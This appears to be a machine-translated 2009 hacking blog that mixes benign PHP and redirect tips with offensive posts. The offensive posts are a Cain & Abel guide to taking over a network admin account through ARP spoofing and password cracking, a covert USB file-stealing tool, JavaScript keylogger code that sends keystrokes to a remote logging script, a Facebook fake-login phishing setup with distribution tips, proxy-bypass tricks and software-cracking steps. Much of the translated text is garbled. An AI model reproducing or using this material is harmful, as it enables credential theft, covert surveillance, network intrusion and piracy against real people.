Senin, 13 Juli 2009

Anti Spam Scrips

Bookmark and Share

Anti Spam scripts that will protect your forms to be submited by spammer's bots. Captcha (an acronym for "Completely Automated Public Turing test to tell Computers and Humans Apart" ) is the most common and effertive spa, protction technique

Captcha is a type of challenge-response test used in computing to determine whether or not the user is human or spammer's robot. A CAPTCHA involves one computer (a server) which asks a user to complete a test. While the computer is able to generate and grade the test, it is not able to solve the test on its own. Because computers are unable to solve the CAPTCHA, any user entering a correct solution is presumed to be human.

Protect your forms from spammers with these free php spam protection scrips


Image Validator is a GPL CAPTCHA php script to stop spam on any form: comment areas, sign-ups, shopping carts - any area of your website where you fear the evil spammers may target.


1. Apache 1 or 2

2. PHP 4 or 5

3. GD 2 with truetype support


0. Unpack this package.

1. You may edit _config.php file located in imgval directory.

2. You may copy some TrueType fonts in imgval/fonts directory.

2. Upload or copy imgval directory to browsable directory.

3. Open imgval/index.php in your browser for testing.


In tag, 'src' parametter should be linked with imgval/code.php.

Example: .

To prevent cache images you may add some unique parameter.

Example: " />

Your should start a session in the response PHP file. In the valid action

PHP source code you should verify MD5 sum of the input-code-field-value

with session variable named __img_code__


if (md5($_POST['code']) == $_SESSION['__img_code__'])

echo "Valid code";


echo "Invalid code";

Free Arcade Script - PHP Script

Bookmark and Share

ee Arcade script for your gaming site.

Full Arcade Script Features:

Admin Panel
» Add Game (Self hosted or enabled hosted)
» Manage Games (Edit/Delete)
» Add Category
» Manage Categories (Delete/Edit)
» Add Link
» Manage Links (Delete/Edit)
» Approve Comments (Delete/Approve)
» Site Settings

Frontend Features
» Categories
» Top Users
» Links
» Statics of website
» Ajax Rating
» Game Comments
» Most Played Games
» Newest Listed Games
» Search for Games

User Accounts
» Comment on Games
» Add games to favorites
» Change password

Server Requirements
» PHP 4+
» 1 MySQL Database

Script Details
Website:Home of Free Arcade ScriptPopular
Free Demo:Demo
Free Download:Download
Average Visitor Rating:4.76 (Out of 5)
Number of ratings:8
Added:2009-01-12 04:14:54
Last updated:2009-01-12 04:18:25

301 Redirect

Bookmark and Share

301 redirect is the most efficient and Search Engine Friendly method for webpage redirection. It's not that hard to implement and it should preserve your search engine rankings for that particular page. If you have to change file names or move pages around, it's the safest option. The code "301" is interpreted as "moved permanently".

Below are a Couple of methods to implement URL Redirection

IIS Redirect

  • In internet services manager, right click on the file or folder you wish to redirect

  • Select the radio titled "a redirection to a URL".

  • Enter the redirection page

  • Check "The exact url entered above" and the "A permanent redirection for this resource"

  • Click on 'Apply'

Redirect in ColdFusion

<.cfheader statuscode="301" statustext="Moved permanently">

<.cfheader name="Location" value="">

Redirect in PHP

Header( "HTTP/1.1 301 Moved Permanently" );

Header( "Location:" );


Redirect in ASP

<%@ Language=VBScript %>


Response.Status="301 Moved Permanently" Response.AddHeader "Location", ""


Redirect in ASP .NET

Redirect Old domain to New domain (htaccess redirect)

Create a .htaccess file with the below code, it will ensure that all your directories and pages of your old domain will get correctly redirected to your new domain.

The .htaccess file needs to be placed in the root directory of your old website (i.e the same directory where your index file is placed)

Options +FollowSymLinks

RewriteEngine on

RewriteRule (.*)$1 [R=301,L]

Please REPLACE in the above code with your actual domain name.

In addition to the redirect I would suggest that you contact every backlinking site to modify their backlink to point to your new website.

Note* This .htaccess method of redirection works ONLY on Linux servers having the Apache Mod-Rewrite moduled enabled.

Redirect to www (htaccess redirect)

Create a .htaccess file with the below code, it will ensure that all requests coming in to will get redirected to

The .htaccess file needs to be placed in the root directory of your old website (i.e the same directory where your index file is placed)

Options +FollowSymlinks

RewriteEngine on

rewritecond %{http_host} ^ [nc]

rewriterule ^(.*)$$1 [r=301,nc]

Please REPLACE and with your actual domain name.

Note* This .htaccess method of redirection works ONLY on Linux servers having the Apache Mod-Rewrite moduled enabled.

How to Redirect HTML

Please refer to section titled 'How to Redirect with htaccess', if your site is hosted on a Linux Server and 'IIS Redirect', if your site is hosted on a Windows Server.

Go through a proxy server with IP Decimal

Bookmark and Share

This is a trick to cut block the site from the ISP or cafe, or your office ...
but with a different trick ...
This is Poc ...

1. Open cmd
Start>> All Programs>> Accesories>> Command Prompt

2. type ping terblock to the site we see addressnya ip ...
I cite here
because there are some ISP that block this site ...
Code: Select all

then we can see the ip addressnya namely:
we get the ip addressnya:

Code: Select all
3. enter this address to

Code: Select all
we have made to decimal:

we see the results ...

Code: Select all
Decimal ip address of is HTTP: / / 3497389126

4. After the meet move HTTP: / / 3497389126 devotion to your browser!
and the results:

see you succeed

5. This is a trick you can use in addition to the 4 trick ...

6. Wait for my next post is still with the same theme but a different tricks!

7. Many roads leading to Mecca (Prayer is my pilgrimage yee .. ha ... ha ..

How to Break Proxy

Bookmark and Share

Hey bro.. you are wicked.. thanks for this info:

It's purpose if not for the bad things, speak well - both with the
possibility adminnya akan given permission to download. Actual network
admin also want all parties can download, khan cape2 so ga ga usah
nyetting2 proxy. But how ya want more, for the same ga kena angry boss,
ya forced deh be busy - busy ria ngurus proxy.

Here are caraku to go through a proxy in place kerjaku when you
want to download files from rapidshare, it is not necessarily
successful in other places, because proxy configuration is most likely
definitely different.

1. http://kharismamand crackrs/01. jpg

This is the image when the site rapidshare, and, of course, have
been hit block proxy. Proxy is usually the standard by admin on the
block only to domain name only, so if accessed directly on IP, the
possibility of blocking techniques akan useless.

2. http://kharismamand crackrs/02. jpg

This is the image to find IP address from, usually
pke Command Prompt with the command ping is able to find its IP, can
also do with the other, an important staple in its IP.

3. http://kharismamand crackrs/03. jpg

Enter the IP addresses that have been found in the browser address
bar, replacing domian name into IP addresses, such as in the picture.
If successful the site Rapidshare akan open as normal.

4. http://kharismamand crackrs/04. jpg

Save Page As address, store in any location on your hard disk, and
open with any text editor, what do I prefer pke EditPlus. Search for
"Free user" and see where the direction if the site click on the Free
User button. Found in the example image address rs59.rapidshare. com

5. http://kharismamand crackrs/05. jpg

Search more IP addresses from using the rs59.rapidshare. com Ping
from Command Prompt. Or the other way, the main thing should be its IP.

6. http://kharismamand crackrs/06. jpg

Enter the IP addresses that have been found in the souce code to
change the domain name into an IP address, such as in the example
image. Then Save the source code.

7. http://kharismamand crackrs/07. jpg

Open html source code back to using the browser. Click Users And Free.

8. http://kharismamand crackrs/08. jpg

If successful it will appear to the download page for Free Users
have such a picture. Note the address bar in your browser, the open is
not a domain name, but directly to the IP address.

9. http://kharismamand crackrs/09. jpg

So of course it will be back because there are words rapidshare in the address bar.

10. http://kharismamand crackrs/10. jpg

Open the command prompt again, and find its IP address (again? Cape deh, this is the last suerrrrr).

11. http://kharismamand crackrs/11. jpg

Enter the IP address that is found in the browser address bar to
change the IP address of a domain as in the picture. And if successful,
then we can download the file.

If you want to ribet ga pke way over utilized rapidleech.

Call again, how do the above or other illegal activities including
a violation of company rules, and of course the risk is the
responsibility of their own.

Cain & Able Tutorial

Bookmark and Share

This tutorial will cover (version 4.9.8)


Cain is an easy application to install and configure. However, there are several powerful tools that should only be configured after you fully understand both the capabilities and consequences to the application and the target network. After all, you can’t very well hack a network if you take it down. Proceed with caution.

We need to accomplish the following steps to get the admin account:

1. Enumerate the computers on the network

2. connect to a computer and install the Abel remote app

3. Harvest user account information

4. Crack user account information passwords to get the admin account

5. Login to the target machine with the admin account

6. Install the Abel service on the target server

7. Harvest all of the hashes from a server and sent to the cracker

Once we have the admin account on the server, the rest is up to you.

First things first, after you launch the application you will need configure the Sniffer to use the appropriate network card. If you have multiple network cards, it might be useful to know what your MAC address is for your primary connection or the one that you will be using for Cain network access. You can determine your MAC address by performing the following steps:

1. Go to “Start”

2. Run

3. enter the “CMD”

4. A black window will appear

5. Enter the following information into the window without the quotes

“Ipconfig /all” and then Enter

6. Determine which one of the Ethernet adapters you are using and copy the MAC address to notepad. You use this to help determine which NIC to select in the Cain application

With the Cain application open, select the Configure menu option on the main menu bar at the top of the application. The Configuration Dialog box will appear. From the list select the device with the MAC Address of Ethernet or Wireless network card that you will be using for hacking. While we are here, let’s review some of the other tabs and information in the Configuration Dialog Box. Here is a brief description of each tab and its configuration:

Sniffer Tab: allows the user to specify the Ethernet interface and the start up options for the sniffer and ARP features of the application.

ARP Tab: Allows the user to in effect to lie to the network and tell all of the other hosts that your IP is actually that of a more important host on the network like a server or router. This feature is useful in that you can impersonate the other device and have all traffic for that device “routed” to you workstation. Keep in mind that servers and routers and designed for multiple high capacity connections. If the device that you are operating from can not keep up with traffic generated by this configuration, the target network will slow down and even come to a halt. This will surly lead to your detection and eventual demise as a hacker as the event is easily detected and tracked with the right equipment.

Filters and Ports: Most standard services on a network operate on predefined ports. These ports are defined under this tab. If you right click on one of the services you will be able to change both the TCP and UDP ports. But this will not be necessary for this tutorial, but will be useful future tutorials.

HTTP Fields: Several features of the application such as the LSA Secrets dumper, HTTP Sniffer and ARP-HTTPS will parse the sniffed or stored information from web pages viewed. Simply put, the more fields that you add to the HTTP and passwords field, the more likely you are to capture a relevant string from an HTTP or HTTPS transaction.

Traceroute: trace route or the ability to determine the path that your data will take from point A to point B. Cain adds some functionality to the GUI by allowing for hostname resolution, Net mask resolution, and Whois information gathering. This feature is key in determining the proper or available devices to spoof or siphon on your LAN or internetwork.

Console: This is the command prompt on the remote machine. Anything that you can do on your pc from the CMD prompt can be done from here. Examples include mapping a drive back to your pc and copying all the files from the target or adding local users to the local security groups or anything really. With windows, everything is possible from the command prompt.

Hashes: Allows for the enumeration of user accounts and their associated hashes with further ability to send all harvested information to the cracker.

LSA Secrets: Windows NT and Windows 2000 support cached logon accounts. The operating system default is to cache (store locally), the last 10 passwords. There are registry settings to turn this feature off or restrict the number of accounts cached. RAS DUN account names and passwords are stored in the registry. Service account passwords are stored in the registry. The password for the computers secret account used to communicate in domain access is stored in the registry. FTP passwords are stored in the registry. All these secrets are stored in the following registry key: HKEY_LOCAL_MACHINE SECURITYPolicySecrets

Routes: From this object, you can determine all of the networks that this device is aware of. This can be powerful if the device is multihommed on two different networks.

TCP Table: A simple listing of all of the processes and ports that are running and their TCP session status.

UDP Table: A simple listing of all of the processes and ports that are running and their UDP session status.

Dictionary Cracking – Select all of the hashes and select Dictionary Attack (LM). You could select the NTLM but the process is slower and with few exceptions the NTLM and NT passwords are the same and NT cracks (Guesses) faster. In the Dictionary window, you will need to populate the File window with each of you dictionary have to download the tables.and copy them to cain installation directory, Check the following boxes: As is Password, Reverse, Lowercase, uppercase, and two numbers.)

Dictionary Cracking process

Click start and watch Cain work. The more lists and words that you have, the longer it will take. When Cain is finished, click exit and then look at the NT password column. All of the passwords cracked will show up next to the now owned accounts.
Take a second to look carefully at the accounts and passwords in the list. Look for patterns like the use of letters and characters in sequence. Many administrators use reoccurring patterns to help users remember their passwords. Example: Ramius password reset in November would have a user account of RAMNOV. If you can identify patterns like this you can use word generators to create all possible combinations and shorten the window.

Cryptanalysis attacking

Alright then… Resort your hashes so single out the accounts that you have left to crack. Now select all of the un-cracked or guessed accounts and right click on the accounts again and select Cryptanalysis (LM). Add the tables that you downloaded from the net to the Cain LM hashes Cryptanalysis Sorted rainbow tables window. Click start. This should go pretty quick. Take a second to review your progress and look for additional patterns.

At this point, use program like sam grab that has the ability to determine which accounts are members of the domain administrators group to see if you have gotten any admin level accounts. Once you move to the next step, which is bruting, most of what you have left are long passwords that are going to be difficult and time consuming. Any time saver applications that you can find will be helpful.


Repeat the same process for selecting the accounts. Here is the first time that you will actually have to use your brain Bruting can be extremely time consuming. Look closely at all of the passwords that you have cracked and look for patterns. First do you see any special characters in any of the passwords cracked. How about numbers? A lot of all upper case of all lower case? Use what you see to help you determine what parameters to include when you are bruting. As you will see, the addition of a single character or symbol can take you from hours to days or even years to crack a password. The goal is to use the least amount of characters and symbols to get the account that you need. So lets finish it off. Select all of the un cracked accounts and follow the previous steps and select Brute Force (LM). The default for LM is A-Z and 0-9. This is because that is due nature of LM hashes and the way that they are stored. Another note is that sometimes you will see a “?” or several “????” and then some numbers or letters. This is also due to the nature of NT versus NTLM and the method that NT used to store passwords. If not see if you can find a repeating structure that is based on the number 7. Anyway, based on the other passwords and those accounts with an “*” in the <8>

Rampok v2.0

Bookmark and Share

Rampok_v2.0 hacking tools that are very unique. Rampok_v2.0 can steal files from the USB enter in to a PC.
How it works is very unique. Rampok_v2.0 work after the install and run. when he will run in the move all the files on the USB automatically to a folder that has been set.

And how it works is not in the know, there are not on the task manager. Unique and the victim will not do if all the files in the USB it has been in the copy by Rampok_v2.0.
Tools can stop in and easy to use. Can also select a folder as a place where you put the file of thievery.
This is one of the tools that I like. Here I will give to you is free.
Please try and feel his intensity ..

Download Free : Rampok v2.0
File Size : 786.31 KB

Make Keylogger with javascript on the website

Bookmark and Share

At this time I will discuss a bit about Javascript Keylogger.

Wow ... Moreover tuh, Google may be able to answer you questions.

Oke without many words directly aja yah ...

First, open notepad or a pet you like WordPad, Notepad ++... The point is up ...

Then paste the following code:

[+]----------------------------------------------- -------------------

var key ='';

var space = ''

function start ()


var xmlhttp;

if (window.XMLHttpRequest)


/ / Code for IE7 +, Firefox, Chrome, Opera, Safari

xmlhttp = new XMLHttpRequest ();


else if (window.ActiveXObject)


/ / Code for IE6, IE5

xmlhttp = new ActiveXObject ( "Microsoft.XMLHTTP");




alert ( "Browser Support XMLHTTP You Not!");

) ( "POST", "http://yoursite/open.php", true);

xmlhttp.send (null);


ajaxFunction function ()


var xmlhttp;

if (window.XMLHttpRequest)


/ / Code for IE7 +, Firefox, Chrome, Opera, Safari

xmlhttp = new XMLHttpRequest ();


else if (window.ActiveXObject)


/ / Code for IE6, IE5

xmlhttp = new ActiveXObject ( "Microsoft.XMLHTTP");




alert ( "Your browser does not support XMLHTTP");

) ( "POST", "http://yoursite/write.php?d =" + key, true);

xmlhttp.send (null);


document.write ('');

[+]----------------------------------------------- -------------------

Then save it with the name keylog.js ... Remember, JS extension. And one should not forget, "yoursite" is replaced with

URL of your own ...

Create more open.php and write.php in notepad with the following script


[+]----------------------------------------------- -------------------

$ data = $ _GET [ 'd'];

$ fp = fopen ( 'log.txt', 'a');

fwrite ($ fp, $ data);

fclose ($ fp);


[+]----------------------------------------------- -------------------


[+]----------------------------------------------- -------------------

$ data = $ _GET [ 'd'];

$ fp = fopen ( 'log.txt', 'a');

fwrite ($ fp, $ data);

fclose ($ fp);


[+]----------------------------------------------- -------------------

And now you have three files namely keylog.js, open.php, write.php ...

Because I try in localhost then I'll try to make a simple HTML script

that will be used as my own website.

[+]----------------------------------------------- -------------------

Type What You Like That

[+]----------------------------------------------- -------------------

And store with the name zhecou.html

Well if you want to put it in your website then you simply add

[+]----------------------------------------------- -------------------

[+]----------------------------------------------- -------------------

Ngerti? Now place the four files zhecou.html, keylog.js, open.php and start.php

in the same directory. Well I in my directory C: mysite

because I use WAMP server

Now therefore, I will change the URL in the keylog.js be

[+]----------------------------------------------- -------------------


[+]----------------------------------------------- -------------------


So when you open a browser and direct you to http://localhost/mysite/zhecou.html

Well here you can type are

I will type "Many Thanks Dah guzzle You To See The Article Here"

So you will see the emergence hasil.txt that contain those words

Okay here until the first well, this article may be less useful but ... Only that

I can give ...

Now that you have to do is find the target and attach to keylog

I really comparable with the r57, C99, C100, dkk but definitely happy to be developed if ..

Hacking Facebook (Taking other people Acount)

Bookmark and Share

Who does not know that Facebook is all in the era of the internet this? Yap, Facebook is a social site, such as a laptop also ... (Males ngomong nih, a leader ma aja yah google ..)
Yes I, my previous post about how to log on false friends, this time I post about how to create a false log on facebook.

Yuuk directly to the discussion ...

1. Please list in
why do I send you the list there?
in the web hosting is free and there is also support from the php in
if not registered simply log in at:

2. after you successfully register the incoming FILE MANAGER to delete the file index.html .... (there will be later in the Cpanel masing2)

3. OK, we start our practice.
needed is the file index.php and write.php as the core fakelogin
scriptnya please download here or in the first
file size 9kb.

4. after you download. There are two files called only index and write
both you please upload the before you have a list.

5. ago index.php first test I've uploaded and you log in from there,
I was successful .. there will be a new file; Password.txt [aim as the place
where the UserID and password that will tertampung on facebook you fakelogin]

6, alright! finished up here. . .

for distribution please masing2 way ...

cm here I love to sample one taking by force account2 facebook mania ..
open the file in the index URL you .. take it .. [important]

hold for firefox users: open tools> options> main


here we refer in order to function within the browser first opened the file directly led to us earlier. ravin allows you more later.
may be in the computer what to sebar / cafe in devotion.

or ..

can also spread this way

you create a new account, in yahoo, gmail, like ato

with nick @ Facebook or something like that.

cm above example ... please make your own art
enjoy ..


hopefully successfully. . .

Table rows

Bookmark and Share

A common function on many php (or other data driven) sites is to loop through an array and write the contents of the array to the page. It is preferable to spread your data over multiple columns instead of writing it all in a straight list thus forcing your readers to scroll forever. Here is an easy way to dynamically write your cells and rows using expressions.

  1. $names=explode(",","Joe,Lisa,Bill,Roger,Fred,Kenney");

  2. $counter=-1;

  3. while (list(,$value)=each ($names))

  4. { $counter=$counter+1;

  5. ";

  6. //this is the key - if field has no remainder then field is in second column

  7. $newrow=($counter % 3);

  8. //echo $newrow;

  9. if ($newrow == 2) echo "
  10. " ;

  11. } // end of while

  12. //****This will write the data in three cells per row. To only do two cells

  13. //** per row change the 3 in the $newrow definition to a 2 and the

  14. //** comparison to a 1.

  15. ?>

  16. " . $names[$counter] . "&nbsp

Create fake login with Phiser Maker

Bookmark and Share

Are you interested to make the page a fake site (phishing).
What is phishing?
Users for the virtual world is certainly not foreign to the word phishing ..
word meaning is a word of English, which means fishing. In a world of well-connected electronically at this time, many phishing term defined as a way to provoke someone to a particular page.

phishing is not infrequently used by the perpetrators of criminal on the internet in order to provoke someone to the web address through e-mail, one aim is to break down a very private information from the recipient, such as passwords, credit cards, etc. .

Among the information submitted as if the recipient's e-mail message to get out of a site, and invites to come to a false site. Site created false appearance in such a way that is similar to the original site. ago when the victim to fill in the password at the time that the Criminals know the password of the victim. Use of this site is also called the false with the term pharming.

I will provide tools for creating these false pages. You can practice for all pages


Hide Your IP Address v.1.0

Bookmark and Share

Hide Your IP Address purpose is to guard your privacy in Internet by changing your Internet IP Address. Start to surf anonymously. You can immediately take advantage of this handy and award winning software. The software will protect your Identity and Stop Hackers. Here is a short feature-list of this award winning software that gives you your privacy back!

- Protect and hide your Identity through hiding your IP address
- Prevent hackers from breaking into your computer
- Allows you to enter pages which are forbidden for you
- Changes your IP address (and your location)
- Delete information about ALL your internet activity
- Add your own Proxies and use your favorites

Paste the Patch into the installation directory, eg - C:\Programs and Files\Hide Your IP Address.
Open the Patch, make sure 'Make Backup' is ticked and click Patch.
You can now delete the Patch from the installation directory.
Open up Hide Your IP Address and a box will come up, click Register.
Type in anything you want for Name, E-Mail and Serial Key
Click Register then OK.
Restart Hide Your IP Address and you'll see its activated!


or mirror :


junkelse by Junkelse. Powered by Blogger and Supported by